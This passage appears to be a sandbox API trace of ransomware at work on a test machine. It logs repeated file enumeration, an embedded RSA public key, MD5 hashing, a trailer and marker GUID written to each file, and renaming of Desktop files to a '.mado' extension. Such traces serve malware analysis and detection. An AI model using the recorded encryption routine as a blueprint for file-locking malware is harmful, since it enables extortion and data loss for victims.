HALPmcxz\\Desktop\\vtRaYVcLR-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtrayvclr-.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.893] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=96664) returned 1 [0203.893] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.895] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17972, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.895] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.896] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x17998, lpOverlapped=0x0) returned 1 [0203.897] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.897] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.897] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.897] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.898] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.898] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.898] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.898] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.898] GetLastError () returned 0x0 [0203.898] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.898] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.898] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.898] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.898] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.899] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.899] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17998, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.899] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.900] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.900] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.900] CloseHandle (hObject=0x63c) returned 1 [0203.901] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vtRaYVcLR-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtrayvclr-.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vtRaYVcLR-.bmp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vtrayvclr-.bmp.mado")) returned 1 [0203.903] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x224fd910, ftCreationTime.dwHighDateTime=0x1d5e7db, ftLastAccessTime.dwLowDateTime=0x76f826f0, ftLastAccessTime.dwHighDateTime=0x1d5db62, ftLastWriteTime.dwLowDateTime=0x76f826f0, ftLastWriteTime.dwHighDateTime=0x1d5db62, nFileSizeHigh=0x0, nFileSizeLow=0xaa27, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xeCrf8bBjM.jpg", cAlternateFileName="XECRF8~1.JPG")) returned 1 [0203.903] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xeCrf8bBjM.jpg") returned=".jpg" [0203.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xeCrf8bBjM.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xecrf8bbjm.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.903] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=43559) returned 1 [0203.903] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.904] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xaa01, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.905] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.905] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xaa27, lpOverlapped=0x0) returned 1 [0203.906] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.906] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.906] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.906] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.906] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.906] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.906] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.907] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.907] GetLastError () returned 0x0 [0203.907] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.907] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0203.907] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.907] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.907] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.907] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xaa27, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.907] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.908] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.908] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.908] CloseHandle (hObject=0x63c) returned 1 [0203.909] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xeCrf8bBjM.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xecrf8bbjm.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xeCrf8bBjM.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xecrf8bbjm.jpg.mado")) returned 1 [0203.911] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf12a1650, ftCreationTime.dwHighDateTime=0x1d5de68, ftLastAccessTime.dwLowDateTime=0xb4305040, ftLastAccessTime.dwHighDateTime=0x1d5e294, ftLastWriteTime.dwLowDateTime=0xb4305040, ftLastWriteTime.dwHighDateTime=0x1d5e294, nFileSizeHigh=0x0, nFileSizeLow=0xe7c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z9XMIcR5j1YonGU3n.mp3", cAlternateFileName="Z9XMIC~1.MP3")) returned 1 [0203.911] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z9XMIcR5j1YonGU3n.mp3") returned=".mp3" [0203.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z9XMIcR5j1YonGU3n.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z9xmicr5j1yongu3n.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.911] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=59336) returned 1 [0203.911] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.913] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe7a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.913] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.914] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xe7c8, lpOverlapped=0x0) returned 1 [0203.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.915] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.915] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.916] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.916] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.916] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.916] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.916] GetLastError () returned 0x0 [0203.916] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.916] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.916] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.916] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.916] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.916] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b67078, Size=0x218) returned 0x3b7c6a8 [0203.917] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe7c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.917] WriteFile (in: hFile=0x63c, lpBuffer=0x3b68078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b68078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.917] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.917] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.917] CloseHandle (hObject=0x63c) returned 1 [0203.918] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z9XMIcR5j1YonGU3n.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z9xmicr5j1yongu3n.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z9XMIcR5j1YonGU3n.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z9xmicr5j1yongu3n.mp3.mado")) returned 1 [0203.919] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528b3090, ftCreationTime.dwHighDateTime=0x1d5dedd, ftLastAccessTime.dwLowDateTime=0x75fa4430, ftLastAccessTime.dwHighDateTime=0x1d5da8c, ftLastWriteTime.dwLowDateTime=0x75fa4430, ftLastWriteTime.dwHighDateTime=0x1d5da8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zUdwhkJ", cAlternateFileName="")) returned 1 [0203.919] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3813fdb0, ftCreationTime.dwHighDateTime=0x1d5e7ec, ftLastAccessTime.dwLowDateTime=0x22347f40, ftLastAccessTime.dwHighDateTime=0x1d5d9ed, ftLastWriteTime.dwLowDateTime=0x22347f40, ftLastWriteTime.dwHighDateTime=0x1d5d9ed, nFileSizeHigh=0x0, nFileSizeLow=0xcbba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzWIu6eAVS.jpg", cAlternateFileName="ZZWIU6~1.JPG")) returned 1 [0203.920] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZzWIu6eAVS.jpg") returned=".jpg" [0203.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZzWIu6eAVS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zzwiu6eavs.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.920] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=52154) returned 1 [0203.920] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.921] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xcb94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.921] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.922] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xcbba, lpOverlapped=0x0) returned 1 [0203.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.922] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0203.924] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.924] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.924] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.924] 